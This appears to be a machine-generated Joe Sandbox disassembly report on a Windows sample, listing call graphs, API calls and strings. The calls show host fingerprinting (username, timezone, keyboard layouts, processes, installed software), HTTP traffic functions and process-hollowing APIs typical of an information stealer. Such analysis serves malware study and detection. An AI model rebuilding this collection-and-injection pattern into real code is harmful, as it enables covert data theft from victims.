lstrcpyA 22558->22559 22560 93f36 22559->22560 22561 90609 3 API calls 22560->22561 22562 93f4e 22561->22562 22563 9058d lstrcpyA 22562->22563 22564 93f56 22563->22564 23222 91997 22564->23222 22566 93f67 22567 905c7 2 API calls 22566->22567 22568 93f75 22567->22568 22569 9058d lstrcpyA 22568->22569 22570 93f7d 22569->22570 22571 90609 3 API calls 22570->22571 22572 93f9d 22571->22572 22573 9058d lstrcpyA 22572->22573 22574 93fa5 22573->22574 22575 90609 3 API calls 22574->22575 22576 93fbd 22575->22576 22577 9058d lstrcpyA 22576->22577 22578 93fc5 22577->22578 22579 90c85 3 API calls 22578->22579 22580 93fd2 22579->22580 22581 90609 3 API calls 22580->22581 22582 93fde 22581->22582 22583 9058d lstrcpyA 22582->22583 22584 93fe6 22583->22584 22585 90609 3 API calls 22584->22585 22586 93ffe 22585->22586 22587 9058d lstrcpyA 22586->22587 22588 94006 22587->22588 22589 90609 3 API calls 22588->22589 22590 9401e 22589->22590 22591 9058d lstrcpyA 22590->22591 22592 94026 22591->22592 23237 90c53 GetProcessHeap HeapAlloc GetUserNameA 22592->23237 22594 94033 22595 90609 3 API calls 22594->22595 22596 9403f 22595->22596 22597 9058d lstrcpyA 22596->22597 22598 94047 22597->22598 22599 90609 3 API calls 22598->22599 22600 9405f 22599->22600 22601 9058d lstrcpyA 22600->22601 22602 94067 22601->22602 22603 90609 3 API calls 22602->22603 22604 9407f 22603->22604 22605 9058d lstrcpyA 22604->22605 22606 94087 22605->22606 23238 91563 7 API calls 22606->23238 22609 905c7 2 API calls 22610 940a6 22609->22610 22611 9058d lstrcpyA 22610->22611 22612 940ae 22611->22612 22613 90609 3 API calls 22612->22613 22614 940ce 22613->22614 22615 9058d lstrcpyA 22614->22615 22616 940d6 22615->22616 22617 90609 3 API calls 22616->22617 22618 940ee 22617->22618 22619 9058d lstrcpyA 22618->22619 22620 940f6 22619->22620 23241 90ddb 22620->23241 22623 905c7 2 API calls 22624 94113 22623->22624 22625 9058d lstrcpyA 22624->22625 22626 9411b 22625->22626 22627 90609 3 API calls 22626->22627 22628 9413b 22627->22628 22629 9058d lstrcpyA 22628->22629 22630 94143 22629->22630 22631 90609 3 API calls 22630->22631 22632 9415b 22631->22632 22633 9058d lstrcpyA 22632->22633 22634 94163 22633->22634 22635 90cc0 9 API calls 22634->22635 22636 94170 22635->22636 22637 90609 3 API calls 22636->22637 22638 9417c 22637->22638 22639 9058d lstrcpyA 22638->22639 22640 94184 22639->22640 22641 90609 3 API calls 22640->22641 22642 9419c 22641->22642 22643 9058d lstrcpyA 22642->22643 22644 941a4 22643->22644 22645 90609 3 API calls 22644->22645 22646 941bc 22645->22646 22647 9058d lstrcpyA 22646->22647 22648 941c4 22647->22648 23253 90d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 22648->23253 22651 90609 3 API calls 22652 941dd 22651->22652 22653 9058d lstrcpyA 22652->22653 22654 941e5 22653->22654 22655 90609 3 API calls 22654->22655 22656 941fd 22655->22656 22657 9058d lstrcpyA 22656->22657 22658 94205 22657->22658 22659 90609 3 API calls 22658->22659 22660 9421d 22659->22660 22661 9058d lstrcpyA 22660->22661 22662 94225 22661->22662 22663 90609 3 API calls 22662->22663 22664 9423d 22663->22664 22665 9058d lstrcpyA 22664->22665 22666 94245 22665->22666 23258 90f51 GetProcessHeap HeapAlloc RegOpenKeyExA 22666->23258 22668 94252 22669 90609 3 API calls 22668->22669 22670 9425e 22669->22670 22671 9058d lstrcpyA 22670->22671 22672 94266 22671->22672 22673 90609 3 API calls 22672->22673 22674 9427e 22673->22674 22675 9058d lstrcpyA 22674->22675 22676 94286 22675->22676 22677 90609 3 API calls 22676->22677 22678 9429e 22677->22678 22679 9058d lstrcpyA 22678->22679 22680 942a6 22679->22680 23261 91007 22680->23261 22683 90609 3 API calls 22684 942bf 22683->22684 22685 9058d lstrcpyA 22684->22685 22686 942c7 22685->22686 22687 90609 3 API calls 22686->22687 22688 942df 22687->22688 22689 9058d lstrcpyA 22688->22689 22690 942e7 22689->22690 22691 90609 3 API calls 22690->22691 22692 942ff 22691->22692 22693 9058d lstrcpyA 22692->22693 22694 94307 22693->22694 23278 90fba GetSystemInfo wsprintfA 22694->23278 22697 90609 3 API calls 22698 94320 22697->22698 22699 9058d lstrcpyA 22698->22699 22700 94328 22699->22700 22701 90609 3 API calls 22700->22701 22702 94340 22701->22702 22703 9058d lstrcpyA 22702->22703 22704 94348 22703->22704 22705 90609 3 API calls 22704->22705 22706 94360 22705->22706 22707 9058d lstrcpyA 22706->22707 22708 94368 22707->22708 23281 91119 GetProcessHeap HeapAlloc 22708->23281 22711 90609 3 API calls 22712 94381 22711->22712 22713 9058d lstrcpyA 22712->22713 22714 94389 22713->22714 22715 90609 3 API calls 22714->22715 22716 943a4 22715->22716 22717 9058d lstrcpyA 22716->22717 22718 943ac 22717->22718 22719 90609 3 API calls 22718->22719 22720 943c7 22719->22720 22721 9058d lstrcpyA 22720->22721 22722 943cf 22721->22722 23288 91192 22722->23288 22725 905c7 2 API calls 22726 943ef 22725->22726 22727 9058d lstrcpyA 22726->22727 22728 943f7 22727->22728 22729 90609 3 API calls 22728->22729 22730 9441a 22729->22730 22731 9058d lstrcpyA 22730->22731 22732 94422 22731->22732 22733 90609 3 API calls 22732->22733 22734 9443a 22733->22734 22735 9058d lstrcpyA 22734->22735 22736 94442 22735->22736 23295 914a5 22736->23295 22739 905c7 2 API calls 22740 94462 22739->22740 22741 9058d lstrcpyA 22740->22741 22742 9446a 22741->22742 22743 90609 3 API calls 22742->22743 22744 94490 22743->22744 22745 9058d lstrcpyA 22744->22745 22746 94498 22745->22746 22747 90609 3 API calls 22746->22747 22748 944b3 22747->22748 22749 9058d lstrcpyA 22748->22749 22750 944bb 22749->22750 23305 91203 22750->23305 22753 905c7 2 API calls 22754 944e0 22753->22754 22755 9058d lstrcpyA 22754->22755 22756 944e8 22755->22756 22757 91203 21 API calls 22756->22757 22758 94509 22757->22758 22759 905c7 2 API calls 22758->22759 22760 94518 22759->22760 22761 9058d lstrcpyA 22760->22761 22762 94520 22761->22762 22763 90609 3 API calls 22762->22763 22764 94543 22763->22764 22765 9058d lstrcpyA 22764->22765 22766 9454b 22765->22766 22767 81cfd lstrcpyA 22766->22767 22768 94560 lstrlenA 22767->22768 22769 904e7 lstrcpyA 22768->22769 22770 9457d 22769->22770 23325 96e97 22770->23325 22772 94586 22772->21109 22774 90519 lstrcpyA 22773->22774 22775 8525a 22774->22775 22776 84ab6 5 API calls 22775->22776 22777 85266 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 22776->22777 22778 852cb 22777->22778 22779 852d9 InternetConnectA 22778->22779 22780 8544b InternetCloseHandle 22778->22780 22781 8543f InternetCloseHandle 22779->22781 22782 85305 HttpOpenRequestA 22779->22782 22787 8545f 22780->22787 22781->22780 22783 85433 InternetCloseHandle 22782->22783 22784 85346 22782->22784 22783->22781 22785 8534a InternetSetOptionA 22784->22785 22786 85366 HttpSendRequestA HttpQueryInfoA 22784->22786 22785->22786 22789 8539e 22786->22789 22792 853bb 22786->22792 22788 9d016 DName::DName 5 API calls 22787->22788 22790 85480 22788->22790 22789->22787 22790->21120 22791 853c1 InternetReadFile 22791->22783 22791->22792 22792->22783 22792->22791 22792->22792 23569 87eee 22793->23569 22795 8ec9e 22796 81cfd lstrcpyA 22795->22796 22797 8eaef StrCmpCA 22799 8eb4c StrCmpCA 22797->22799 22818 8ead3 22797->22818 22801 8ec29 StrCmpCA 22799->22801 22799->22818 22801->22818 22803 904e7 lstrcpyA 22803->22818 22806 90609 lstrlenA lstrcpyA lstrcatA 22806->22818 22808 905c7 2 API calls 22808->22818 22811 90519 lstrcpyA 22811->22818 22815 9058d lstrcpyA 22815->22818 22818->22795 22818->22797 22818->22799 22818->22801 22818->22803 22818->22806 22818->22808 22818->22811 22818->22815 22825 81cfd lstrcpyA 22818->22825 23687 8c77a 230 API calls 22818->23687 23688 8c95c 231 API calls 22818->23688 23689 8d9aa 226 API calls 22818->23689 22825->22818 23125->21962 23127 9d016 DName::DName 5 API calls 23126->23127 23128 92601 23127->23128 23128->21182 23128->21189 23130 904e7 lstrcpyA 23129->23130 23131 82a05 23130->23131 23131->22046 23133 904e7 lstrcpyA 23132->23133 23134 82a16 23133->23134 23134->22046 23136 904e7 lstrcpyA 23135->23136 23137 82a38 23136->23137 23137->22046 23139 904e7 lstrcpyA 23138->23139 23140 82a49 23139->23140 23140->22046 23142 90519 lstrcpyA 23141->23142 23143 96dac 23142->23143 23144 90519 lstrcpyA 23143->23144 23145 96db7 23144->23145 23146 90519 lstrcpyA 23145->23146 23147 96dc2 23146->23147 23147->22064 23148->22046 23149->22046 23151 916ad 23150->23151 23152 9173c 23150->23152 23154 904e7 lstrcpyA 23151->23154 23153 904e7 lstrcpyA 23152->23153 23155 91748 23153->23155 23156 916c0 _memset 23154->23156 23157 9d016 DName::DName 5 API calls 23155->23157 23167 923d5 lstrcpyA malloc strncpy 23156->23167 23158 91755 23157->23158 23158->22085 23160 916ea lstrcatA 23168 82920 23160->23168 23162 91707 lstrcatA 23163 91724 23162->23163 23164 904e7 lstrcpyA 23163->23164 23165 91732 23164->23165 23165->23155 23166->22088 23167->23160 23169 82924 23168->23169 23169->23162 23171 84ac4 23170->23171 23171->23171 23172 84acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 23171->23172 23173 84b27 23172->23173 23173->22098 23175 8806a LocalAlloc 23174->23175 23176 86724 23174->23176 23175->23176 23177 8807a CryptStringToBinaryA 23175->23177 23176->22268 23176->22280 23177->23176 23178 88091 LocalFree 23177->23178 23178->23176 23179->22405 23180->22407 23182 9d016 DName::DName 5 API calls 23181->23182 23183 90d2c 23182->23183 23183->22460 23342 a3c10 23184->23342 23187 91651 RegCloseKey CharToOemA 23189 9d016 DName::DName 5 API calls 23187->23189 23188 91630 RegQueryValueExA 23188->23187 23190 91682 23189->23190 23190->22474 23192 92278 K32GetModuleFileNameExA CloseHandle 23191->23192 23193 92294 23191->23193 23192->23193 23194 904e7 lstrcpyA 23193->23194 23195 922a0 23194->23195 23196 9d016 DName::DName 5 API calls 23195->23196 23197 922ae 23196->23197 23197->22517 23344 90c16 23198->23344 23201 90b5c 23201->22539 23202 90b63 RegOpenKeyExA 23203 90b9b RegCloseKey 23202->23203 23204 90b83 RegQueryValueExA 23202->23204 23203->23201 23204->23203 23351 af109 23205->23351 23207 91813 CoInitializeEx CoInitializeSecurity CoCreateInstance 23208 9186b 23207->23208 23209 91873 CoSetProxyBlanket 23208->23209 23213 91964 23208->23213 23212 918a3 23209->23212 23210 904e7 lstrcpyA 23211 9198f 23210->23211 23214 af165 5 API calls 23211->23214 23212->23213 23216 918d7 VariantInit 23212->23216 23213->23210 23215 91996 23214->23215 23215->22553 23217 918f6 23216->23217 23352 91757 23217->23352 23219 91901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 23220 904e7 lstrcpyA 23219->23220 23221 91958 VariantClear 23220->23221 23221->23211 23361 af09d 23222->23361 23224 919a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 23225 919f9 23224->23225 23226 91a01 CoSetProxyBlanket 23225->23226 23229 91a93 23225->23229 23230 91a31 23226->23230 23227 904e7 lstrcpyA 23228 91abe 23227->23228 23228->22566 23229->23227 23230->23229 23231 91a59 VariantInit 23230->23231 23232 91a78 23231->23232 23362 91d42 LocalAlloc CharToOemW 23232->23362 23234 91a80 23235 904e7 lstrcpyA 23234->23235 23236 91a87 VariantClear 23235->23236 23236->23228 23237->22594 23239 904e7 lstrcpyA 23238->23239 23240 915cd 23239->23240 23240->22609 23242 904e7 lstrcpyA 23241->23242 23243 90e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 23242->23243 23244 90eed 23243->23244 23252 90e3c 23243->23252 23246 90ef9 LocalFree 23244->23246 23247 90f05 23244->23247 23245 90e42 GetLocaleInfoA 23245->23252 23246->23247 23248 9d016 DName::DName 5 API calls 23247->23248 23250 90f15 23248->23250 23249 90609 lstrlenA lstrcpyA lstrcatA 23249->23252 23250->22623 23251 9058d lstrcpyA 23251->23252 23252->23244 23252->23245 23252->23249 23252->23251 23254 90d6a wsprintfA 23253->23254 23255 90d86 23253->23255 23254->23255 23256 9d016 DName::DName 5 API calls 23255->23256 23257 90d93 23256->23257 23257->22651 23259 90fac RegCloseKey 23258->23259 23260 90f94 RegQueryValueExA 23258->23260 23259->22668 23260->23259 23262 9107c GetLogicalProcessorInformationEx 23261->23262 23263 91048 GetLastError 23262->23263 23264 91087 23262->23264 23265 910f3 23263->23265 23266 91057 23263->23266 23365 91b5b GetProcessHeap HeapFree 23264->23365 23272 910fd 23265->23272 23366 91b5b GetProcessHeap HeapFree 23265->23366 23274 9105b 23266->23274 23268 910c0 23268->23272 23273 910c9 wsprintfA 23268->23273 23275 9d016 DName::DName 5 API calls 23272->23275 23273->23272 23274->23262 23276 910ec 23274->23276 23363 91b5b GetProcessHeap HeapFree 23274->23363 23364 91b78 GetProcessHeap HeapAlloc 23274->23364 23277 91117 23275->23277 23276->23272 23277->22683 23279 9d016 DName::DName 5 API calls 23278->23279 23280 91005 23279->23280 23280->22697 23367 91b26 23281->23367 23284 9115f wsprintfA 23286 9d016 DName::DName 5 API calls 23284->23286 23287 91190 23286->23287 23287->22711 23289 904e7 lstrcpyA 23288->23289 23290 911b3 23289->23290 23291 911f3 23290->23291 23292 90549 2 API calls 23290->23292 23293 9d016 DName::DName 5 API calls 23291->23293 23292->23290 23294 91201 23293->23294 23294->22725 23296 904e7 lstrcpyA 23295->23296 23297 914c6 CreateToolhelp32Snapshot Process32First 23296->23297 23298 9154c CloseHandle 23297->23298 23302 914ee 23297->23302 23300 9d016 DName::DName 5 API calls 23298->23300 23299 9153a Process32Next 23299->23298 23299->23302 23301 91561 23300->23301 23301->22739 23302->23299 23303 90609 lstrlenA lstrcpyA lstrcatA 23302->23303 23304 9058d lstrcpyA 23302->23304 23303->23302 23304->23302 23306 904e7 lstrcpyA 23305->23306 23307 9123b RegOpenKeyExA 23306->23307 23308 91478 23307->23308 23324 91281 23307->23324 23309 90519 lstrcpyA 23308->23309 23314 91489 23309->23314 23310 91287 RegEnumKeyExA 23311 912c4 wsprintfA RegOpenKeyExA 23310->23311 23310->23324 23312 9130a RegQueryValueExA 23311->23312 23313 91460 RegCloseKey 23311->23313 23317 91440 RegCloseKey 23312->23317 23318 91340 lstrlenA 23312->23318 23316 9146c RegCloseKey 23313->23316 23319 9d016 DName::DName 5 API calls 23314->23319 23315 9145e 23315->23316 23316->23308 23317->23324 23318->23317 23318->23324 23320 914a3 23319->23320 23320->22753 23321 9058d lstrcpyA 23321->23324 23322 913b0 RegQueryValueExA 23322->23317 23322->23324 23323 90609 lstrlenA lstrcpyA lstrcatA 23323->23324 23324->23310 23324->23315 23324->23317 23324->23321 23324->23322 23324->23323 23326 96ea7 23325->23326 23327 9058d lstrcpyA 23326->23327 23328 96ec4 23327->23328 23329 9058d lstrcpyA 23328->23329 23330 96ee0 23329->23330 23331 9058d lstrcpyA 23330->23331 23332 96eeb 23331->23332 23333 9058d lstrcpyA 23332->23333 23334 96ef6 23333->23334 23335 96efd Sleep 23334->23335 23336 96f0d 23334->23336 23335->23334 23337 96f29 CreateThread WaitForSingleObject 23336->23337 23369 9ccc8 23336->23369 23338 904e7 lstrcpyA 23337->23338 23559 96dc6 23337->23559 23341 96f51 23338->23341 23341->22772 23343 9160c RegOpenKeyExA 23342->23343 23343->23187 23343->23188 23347 90ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 23344->23347 23346 90b58 23346->23201 23346->23202 23348 90bec RegQueryValueExA 23347->23348 23349 90c03 RegCloseKey 23347->23349 23348->23349 23350 90c13 23349->23350 23350->23346 23351->23207 23360 af09d 23352->23360 23354 91763 CoCreateInstance 23355 9178b SysAllocString 23354->23355 23356 917e7 23354->23356 23355->23356 23357 9179a 23355->23357 23356->23219 23358 917e0 SysFreeString 23357->23358 23359 917be _wtoi64 SysFreeString 23357->23359 23358->23356 23359->23358 23360->23354 23361->23224 23362->23234 23363->23274 23364->23274 23365->23268 23366->23272 23368 9114d GlobalMemoryStatusEx 23367->23368 23368->23284 23372 9cc80 23369->23372 23373 96f27 23372->23373 23374 9cc8f 23372->23374 23373->23337 23374->23373 23376 9c472 23374->23376 23377 9c49a 23376->23377 23381 9c4a4 23376->23381 23378 9d016 DName::DName 5 API calls 23377->23378 23380 9caab 23378->23380 23379 9c4ce lstrcpyA 23379->23377 23383 9c4eb 23379->23383 23380->23373 23381->23377 23381->23379 23382 9c55b 23385 9c56d 23382->23385 23386 9c57c 23382->23386 23383->23382 23511 9b870 9 API calls 23383->23511 23512 9bf47 20 API calls 23385->23512 23388 9c591 23386->23388 23389 9c581 23386->23389 23391 9c5a6 23388->23391 23392 9c596 23388->23392 23513 9bfc6 18 API calls DName::DName 23389->23513 23391->23377 23395 9c5af 23391->23395 23514 9c0e9 8 API calls DName::DName 23392->23514 23393 9c57a 23396 9c5b4 23393->23396 23515 9c1ac 8 API calls DName::DName 23395->23515 23396->23377 23398 9c5be lstrcpyA lstrcpyA lstrlenA 23396->23398 23399 9c5fe lstrcatA 23398->23399 23400 9c616 lstrcpyA 23398->23400 23399->23400 23401 9c67f 23400->23401 23439 9ae53 23401->23439 23525 9bd80 malloc WriteFile _memmove 23439->23525 23441 9ae6b 23526 9bd80 malloc WriteFile _memmove 23441->23526 23443 9ae7b 23527 9bd80 malloc WriteFile _memmove 23443->23527 23445 9ae8b 23528 9bd80 malloc WriteFile _memmove 23445->23528 23447 9ae9b 23529 9bd80 malloc WriteFile _memmove 23447->23529 23449 9aead 23530 9bd80 malloc WriteFile _memmove 23449->23530 23451 9aebf 23531 9bd80 malloc WriteFile _memmove 23451->23531 23511->23382 23512->23393 23513->23393 23514->23393 23515->23396 23525->23441 23526->23443 23527->23445 23528->23447 23529->23449 23530->23451 23568 af09d 23559->23568 23561 96dd2 lstrlenA 23565 96dee 23561->23565 23567 96de3 23561->23567 23562 90519 lstrcpyA 23562->23565 23563 85482 45 API calls 23563->23565 23564 9058d lstrcpyA 23564->23565 23565->23562 23565->23563 23565->23564 23566 96e54 StrCmpCA 23565->23566 23566->23565 23566->23567 23568->23561 23693 87eae 11 API calls 23569->23693 23571 87efc 23571->22818 23687->22818 23688->22818 23689->22818 23693->23571

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                                                    • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                                                    • Opcode ID: b3905b6fa3074026e41d427c5a1f9397fd1401337cafd6ae0b0a2d0fe34855ed
                                                                                                                                                                                                                                                    • Instruction ID: 0a89d2afac350e0e8679f771120ddebefb45063f7479495b9a5b1f3be14fb51f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3905b6fa3074026e41d427c5a1f9397fd1401337cafd6ae0b0a2d0fe34855ed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E852C175D02212AFEF427F60FE4C9243BA6F758745353852BE9058A2B0E7724C64EF16

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1507 91807-9186d call af109 CoInitializeEx CoInitializeSecurity CoCreateInstance 1511 91971-91976 1507->1511 1512 91873-918a5 CoSetProxyBlanket 1507->1512 1513 9198a call 904e7 1511->1513 1516 918ab-918b6 1512->1516 1517 9196a-9196f 1512->1517 1518 9198f-91996 call af165 1513->1518 1519 918bc-918d1 1516->1519 1520 91964-91985 1516->1520 1517->1513 1519->1520 1525 918d7-918fc VariantInit call 91757 1519->1525 1520->1513 1528 91901-91962 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA call 904e7 VariantClear 1525->1528 1528->1518
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 0009180E
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,0000004C,00093EF9,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 0009181F
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00091830
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 0009184A
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091880
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 000918DB
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: __EH_prolog3_catch.LIBCMT ref: 0009175E
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: CoCreateInstance.OLE32(000B31B0,00000000,00000001,000BAF60,?,00000018,00091901,?), ref: 00091781
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: SysAllocString.OLEAUT32(?), ref: 0009178E
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: _wtoi64.MSVCRT ref: 000917C1
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: SysFreeString.OLEAUT32(?), ref: 000917DA
                                                                                                                                                                                                                                                      • Part of subcall function 00091757: SysFreeString.OLEAUT32(00000000), ref: 000917E1
                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0009190A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00091916
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0009191D
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0009195C
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00091949
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                    • API String ID: 2280294774-461178377
                                                                                                                                                                                                                                                    • Opcode ID: 314aacbb353075b4027dfb066fe33fd0831d66bc9083b6ed71696ef8b1e7563c
                                                                                                                                                                                                                                                    • Instruction ID: e27718c6c45cb07ad67fe1a5751a0b2006452fe0f2b978a863ea742e6f2064cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314aacbb353075b4027dfb066fe33fd0831d66bc9083b6ed71696ef8b1e7563c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E414C71A40205BBDF209BD5DC89EFFBBBCEF89B11F104219F611AA190D6799941DB20

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
